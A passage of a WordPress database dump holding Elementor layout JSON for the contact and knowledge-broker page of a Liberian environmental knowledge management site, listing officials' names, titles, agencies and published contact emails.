href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24538,3622,'_elementor_edit_mode','builder'),(24539,3622,'_elementor_template_type','wp-page'),(24540,3622,'_elementor_version','3.0.16'),(24541,3622,'_wp_page_template','default'),(24542,3622,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\